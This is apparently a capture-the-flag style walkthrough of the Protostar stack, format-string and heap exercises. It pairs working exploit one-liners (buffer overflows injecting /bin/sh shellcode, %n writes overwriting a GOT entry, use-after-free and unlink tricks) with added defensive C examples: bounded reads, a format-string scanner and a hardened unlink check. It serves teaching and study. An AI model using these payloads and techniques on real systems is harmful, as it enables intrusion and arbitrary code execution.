stack0
$ python -c "print 0x44*'a'" | ./stack0
you have changed the 'modified' variable

stack1
$ python -c "print 0x40*'a'+'\x64\x63\x62\x61'" | xargs ./stack1
you have correctly got the variable to the right value

stack2
import os
payload = 'a'*0x40 + '\x0a\x0d\x0a\x0d'
os.putenv("GREENIE", payload)
os.system("./stack2")

stack3
$ readelf -a stack3 | grep win
There are no unwind sections in this file.
    56: 08048424    20 FUNC    GLOBAL DEFAULT   14 win
$ python -c "print 0x40*'a'+'\x24\x84\x04\x08'" | ./stack3
calling function pointer, jumping to 0x08048424
code flow successfully changed

stack4
$ readelf -a stack4 | grep win
There are no unwind sections in this file.
    56: 080483f4    20 FUNC    GLOBAL DEFAULT   14 win
$ python -c "print 76*'a'+'\xf4\x83\x04\x08'" | ./stack4
code flow successfully changed

stack5
gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : disabled
PIE       : disabled
RELRO     : disabled

ASLR is off on this system. Crash the program and inspect the core dump in the debugger to get the stack address.
$ python -c "print 0x4c*'a'+'\x10\xfd\xff\xbf'+'\x31\xc9\xf7\xe1\xb0\x0b\xeb\x06\x5b\x51\x53\x5b\xcd\x80\xe8\xf5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68'" | ./stack5

stack6
return address => address of a ret instruction => stack address
$ python -c "print 0x50*'a'+'\x08\x85\x04\x08'+'\x04\xfd\xff\xbf'+'\x31\xc9\xf7\xe1\xb0\x0b\xeb\x06\x5b\x51\x53\x5b\xcd\x80\xe8\xf5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68'" | ./stack6

stack7
$ python -c "print 0x50*'a'+'\x53\x85\x04\x08'+'\x04\xfd\xff\xbf'+'\x31\xc9\xf7\xe1\xb0\x0b\xeb\x06\x5b\x51\x53\x5b\xcd\x80\xe8\xf5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68'" | ./stack7

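Every stack level above comes down to the same root cause: input is read into a fixed-size stack buffer with no length bound, so the bytes past the buffer land on the flag, the function pointer or the return address. The following is an added example, not the Protostar source and not the author's code: a stack0-style frame with an int flag right after the buffer, read with a bounded fgets() instead. It also handles the caveat that bounded reads introduce, namely that fgets() leaves the tail of an over-long line in the stream for the next read. It assumes POSIX fmemopen() to feed a constructed input string; the frame layout, BUF_LEN and the 0x44-byte sample input are assumptions modelled on the stack0 payload length, not values from the binary.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

/* Added example, not the Protostar source: an int flag sits directly after a
 * fixed-size buffer, as in stack0. The read below is bounded, so no input
 * length can reach `modified`. */
#define BUF_LEN 64

struct frame {
    char buffer[BUF_LEN];
    volatile int modified;      /* must still be 0 after any input */
};

/* Bounded line read: fgets() writes at most BUF_LEN-1 bytes plus a NUL and
 * therefore cannot run past `buffer`. The newline is stripped when it fit. */
static int read_line_bounded(char *dst, size_t dst_len, FILE *in)
{
    if (fgets(dst, (int)dst_len, in) == NULL)
        return 0;
    dst[strcspn(dst, "\n")] = '\0';
    return 1;
}

/* Caveat: if the line was longer than the buffer, fgets() leaves the rest in
 * the stream, where a later read would consume it as fresh input. Drain it
 * and report how many bytes were discarded. */
static size_t discard_rest_of_line(FILE *in)
{
    size_t n = 0;
    int c;
    while ((c = fgetc(in)) != EOF && c != '\n')
        n++;
    return n;
}

/* Push one input string through the frame. Returns 1 if the flag survived
 * and reports how many bytes were kept and how many were thrown away. */
static int simulate(const char *input, size_t *kept, size_t *truncated)
{
    struct frame f;
    FILE *in = fmemopen((void *)input, strlen(input), "r");   /* POSIX */
    if (in == NULL)
        return -1;
    f.modified = 0;
    memset(f.buffer, 0, sizeof f.buffer);
    *kept = read_line_bounded(f.buffer, sizeof f.buffer, in) ? strlen(f.buffer) : 0;
    *truncated = discard_rest_of_line(in);
    fclose(in);
    return f.modified == 0;
}

int flag_survives(const char *input)
{
    size_t kept, truncated;
    return simulate(input, &kept, &truncated);
}

size_t bytes_kept(const char *input)
{
    size_t kept, truncated;
    simulate(input, &kept, &truncated);
    return kept;
}

size_t bytes_truncated(const char *input)
{
    size_t kept, truncated;
    simulate(input, &kept, &truncated);
    return truncated;
}

/* Constructed input mirroring the stack0 payload length: 0x44 'a' bytes and a
 * newline, i.e. four bytes past the end of the buffer. */
const char *overlong_input(void)
{
    static char buf[0x44 + 2];
    memset(buf, 'a', 0x44);
    buf[0x44] = '\n';
    buf[0x44 + 1] = '\0';
    return buf;
}

int main(void)
{
    const char *in = overlong_input();
    printf("flag survives: %d, kept %zu bytes, discarded %zu bytes\n",
           flag_survives(in), bytes_kept(in), bytes_truncated(in));
    return 0;
}
```

With the 0x44-byte input the flag stays 0, 63 bytes are kept and 5 are discarded; without the drain step those 5 bytes would be returned by the next read, which is the usual source of "the fix broke the next prompt" bugs when gets() is replaced mechanically.
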
format0
root@protostar:/opt/protostar/bin
you have hit the target correctly :)

format1
%128$n refers to the 128th argument; argv is placed on the stack.

format2
[-------------------------------------code-------------------------------------]
   0x8048477 <vuln+35>: call   0x804835c <fgets@plt>
   0x804847c <vuln+40>: lea    eax,[ebp-0x208]
   0x8048482 <vuln+46>: mov    DWORD PTR [esp],eax
=> 0x8048485 <vuln+49>: call   0x804837c <printf@plt>
   0x804848a <vuln+54>: mov    eax,ds:0x80496e4
   0x804848f <vuln+59>: cmp    eax,0x40
   0x8048492 <vuln+62>: jne    0x80484a2 <vuln+78>
   0x8048494 <vuln+64>: mov    DWORD PTR [esp],0x8048590
Guessed arguments:
arg[0]: 0xffffd450 ("aaaaaa\n")
[------------------------------------stack-------------------------------------]
0000| 0xffffd440 --> 0xffffd450 ("aaaaaa\n")
0004| 0xffffd444 --> 0x200
0008| 0xffffd448 --> 0xf7fc2c20 --> 0xfbad2288
0012| 0xffffd44c --> 0xf7fec308 (<_dl_check_map_versions+632>: mov edi,eax)
0016| 0xffffd450 ("aaaaaa\n")

exploit:
root@protostar:/opt/protostar/bin
.0000000000000000000000000000000000000000000000000000080496e4
you have modified the target :)

format3
$ python -c "print '\xf4\x96\x04\x08%12\$016930112x%12\$n'" | ./format3

Looking back, my method is still a bit weak; the basic approach of writing one byte at a time is better.
$ python -c 'print "\xf4\x96\x04\x08"+"\xf5\x96\x04\x08"+"\xf6\x96\x04\x08"+"\xf7\x96\x04\x08"+"%52x%12$n%13$n%14$n%15$n"' | ./format3
target is 44444444 :(

format4
Write into the GOT entry of exit, GOT["exit"] = 0x08049724, one byte at a time.
$ python -c "print '\x24\x97\x04\x08\x25\x97\x04\x08\x26\x97\x04\x08\x27\x97\x04\x08'+'%0164x%4\$n%0208x%5\$n%0128x%6\$n%260x%7\$n'" | ./format4

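format1 through format4 all hinge on one thing: user input reaches printf() as the format argument, and the %n conversion (in its positional %N$n form) turns a read into a write. The fix is always the same, printf("%s", buf) or fputs(), but a defender also wants to recognise these strings in input or logs. The block below is an added example, not Protostar code and not the author's: a small scanner for printf-style directives that understands the positional N$ form used in the payloads above, counts real directives, and singles out %n. The sample strings in main() are constructed, the last two mirroring payload shapes on this page; the risk levels are an assumed triage scheme, not anything from the page.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Added example, not Protostar code: parse one printf directive starting at
 * s[0] == '%'. Returns the bytes consumed; *conv receives the conversion
 * character, '%' for a literal "%%", or 0 if the directive is malformed. */
static size_t parse_directive(const char *s, char *conv)
{
    size_t i = 1, j;
    *conv = 0;
    if (s[i] == '%') { *conv = '%'; return 2; }
    j = i;                                   /* positional "N$", e.g. %12$n */
    while (isdigit((unsigned char)s[j]))
        j++;
    if (j > i && s[j] == '$')
        i = j + 1;
    while (s[i] && strchr("-+ #0'", s[i]))   /* flags */
        i++;
    if (s[i] == '*')                         /* width */
        i++;
    while (isdigit((unsigned char)s[i]))
        i++;
    if (s[i] == '.') {                       /* precision */
        i++;
        if (s[i] == '*')
            i++;
        while (isdigit((unsigned char)s[i]))
            i++;
    }
    while (s[i] && strchr("hlLqjzt", s[i]))  /* length modifiers */
        i++;
    if (s[i] && strchr("diouxXeEfFgGaAcspn", s[i])) {
        *conv = s[i];
        return i + 1;
    }
    return i;                                /* malformed or cut off: not counted */
}

/* Count real directives (excluding "%%") and how many of them are %n. */
static void scan_format(const char *s, int *directives, int *n_writes)
{
    *directives = 0;
    *n_writes = 0;
    while (*s) {
        char conv;
        if (*s != '%') { s++; continue; }
        s += parse_directive(s, &conv);
        if (conv != 0 && conv != '%') {
            (*directives)++;
            if (conv == 'n')
                (*n_writes)++;
        }
    }
}

int count_directives(const char *s)
{
    int d, n;
    scan_format(s, &d, &n);
    return d;
}

int count_n_writes(const char *s)
{
    int d, n;
    scan_format(s, &d, &n);
    return n;
}

/* Assumed triage scale for a string that could become a format argument:
 * 0 = no directives, 1 = read-only directives (memory disclosure),
 * 2 = contains %n (memory write). */
int format_risk(const char *s)
{
    int d, n;
    scan_format(s, &d, &n);
    if (n > 0) return 2;
    return d > 0 ? 1 : 0;
}

int main(void)
{
    /* constructed samples; the last two mirror payload shapes on this page */
    const char *samples[] = { "plain text", "100%% done", "%p %p %p %p",
                              "%128$n", "%52x%12$n%13$n%14$n%15$n" };
    for (size_t k = 0; k < sizeof samples / sizeof samples[0]; k++)
        printf("%-28s directives=%d %%n=%d risk=%d\n", samples[k],
               count_directives(samples[k]), count_n_writes(samples[k]),
               format_risk(samples[k]));
    return 0;
}
```

The scanner is deliberately stricter than printf itself: a lone trailing "%" or an unknown conversion is not counted, so it never raises a finding on plain text that merely contains a percent sign. In a real code base the compiler flag -Wformat-security catches the printf(buf) pattern at build time; the scanner is for the input side.
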
heap0
winner = 0x08048464
root@protostar:/opt/protostar/bin
data is at 0x804a008, fp is at 0x804a050
level passed

heap1
GOT["puts"] = 0x08049774
winner = 0x08048494
Not much to say: overwrite the second pointer with the GOT address of puts, so that the second strcpy writes winner into the GOT entry of puts.
root@protostar:/opt/protostar/bin
and we have a winner @ 1491862467

heap2
An obvious UAF: struct auth is 36 bytes. Create auth, free it, then use strdup to allocate a 36-byte block.
[ auth = (nil), service = (nil) ]
auth aaaaa
[ auth = 0x903d008, service = (nil) ]
reset
[ auth = 0x903d008, service = (nil) ]
serviceaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
[ auth = 0x903d008, service = 0x903d018 ]
login
you have logged in already!
[ auth = 0x903d008, service = 0x903d018 ]

heap3
unlink gives an arbitrary address write.
root@protostar:/opt/protostar/bin
that wasn't too bad now, was it? @ 1491865342

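The one-line note above is the whole story of heap3: the allocator's unlink step trusts a chunk's fd and bk pointers, so a forged pair turns the two stores in unlink into a write of a chosen value to a chosen address. The block below is an added example, neither glibc nor Protostar code: a toy circular free list with the classic unlink beside the hardened form that applies the consistency check modern glibc performs before unlinking (the check behind its "corrupted double-linked list" abort). The list, the chunk layout and the decoy struct are constructed for the demonstration and do not correspond to real heap addresses.

```c
#include <stddef.h>
#include <stdio.h>

/* Added example, neither glibc nor Protostar code: a toy doubly-linked,
 * circular free list with a sentinel head. */
struct chunk {
    struct chunk *fd;
    struct chunk *bk;
};

struct free_list {
    struct chunk head;          /* sentinel; an empty list points at itself */
};

void list_init(struct free_list *l)
{
    l->head.fd = l->head.bk = &l->head;
}

/* Insert at the front of the list. */
void list_insert(struct free_list *l, struct chunk *c)
{
    c->fd = l->head.fd;
    c->bk = &l->head;
    l->head.fd->bk = c;
    l->head.fd = c;
}

/* Classic unlink: trusts p->fd and p->bk unconditionally. Each line is a
 * pointer-sized store through one of those links. */
void unlink_unchecked(struct chunk *p)
{
    p->fd->bk = p->bk;
    p->bk->fd = p->fd;
}

/* Hardened unlink: both neighbours must point back at p, otherwise the chunk
 * is left untouched. Returns 1 on success, 0 when the links are inconsistent
 * (a forged pair, or a chunk that was already unlinked). */
int unlink_checked(struct chunk *p)
{
    if (p->fd == NULL || p->bk == NULL)
        return 0;
    if (p->fd->bk != p || p->bk->fd != p)
        return 0;
    p->fd->bk = p->bk;
    p->bk->fd = p->fd;
    p->fd = p->bk = NULL;       /* poison so a second unlink is refused */
    return 1;
}

/* Scenario 1: a chunk whose fd was overwritten to point at a decoy struct
 * (constructed here; on a real heap it would be whatever address the forged
 * link names). Returns 1 when the checked unlink refuses the chunk and the
 * unchecked one performs the store into the decoy. */
int demo_forged_links(void)
{
    struct free_list l;
    struct chunk a, b, decoy = { NULL, NULL };

    list_init(&l);
    list_insert(&l, &a);
    list_insert(&l, &b);        /* list: head <-> b <-> a <-> head */
    a.fd = &decoy;              /* forged forward link */

    if (unlink_checked(&a) != 0 || decoy.bk != NULL)
        return 0;               /* must be rejected, decoy must be untouched */
    unlink_unchecked(&a);       /* stores a.bk (== &b) into decoy.bk */
    return decoy.bk == &b;
}

/* Scenario 2: an honest chunk unlinks once and is refused the second time. */
int demo_honest_unlink(void)
{
    struct free_list l;
    struct chunk a, b;

    list_init(&l);
    list_insert(&l, &a);
    list_insert(&l, &b);
    if (unlink_checked(&b) != 1)
        return 0;
    if (l.head.fd != &a || a.bk != &l.head)
        return 0;               /* list is head <-> a <-> head again */
    return unlink_checked(&b) == 0;
}

int main(void)
{
    printf("forged links rejected by checked unlink: %d\n", demo_forged_links());
    printf("honest unlink once, refused twice:       %d\n", demo_honest_unlink());
    return 0;
}
```

The check costs two loads and two compares per unlink, which is why allocators adopted it; the Protostar VM ships a glibc old enough to lack it, which is the only reason the heap3 write above is unchecked.
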